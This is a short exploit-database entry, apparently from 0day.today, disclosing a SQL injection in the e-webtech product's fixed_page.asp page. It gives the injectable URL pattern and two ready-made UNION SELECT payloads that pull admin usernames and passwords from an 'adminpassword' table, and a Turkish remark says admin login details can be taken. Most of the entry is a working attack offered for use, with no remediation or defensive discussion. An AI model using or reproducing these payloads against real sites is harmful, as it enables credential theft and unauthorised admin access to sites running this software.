id: 12217
date: 05/12/2010
title: e-webtech (fixed_page.asp) SQL Injection Vulnerability
author: Fl0riX
cves: 

======================================================
e-webtech (fixed_page.asp) SQL Injection Vulnerability
======================================================

####################################################
# Author   : Fl0riX
#
# Name     : e-webtech
#
# Bug Type   : SQL Injection
#
# Infection    : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://[site]/fixed_page.asp?id=[SQL Inj.]
#
# User Exploit:null+union+all+select+1,username+from+adminpassword
# Password Exploit:null+union+all+select+1,pw+from+adminpassword
####################################################



#  0day.today [2023-03-27]  #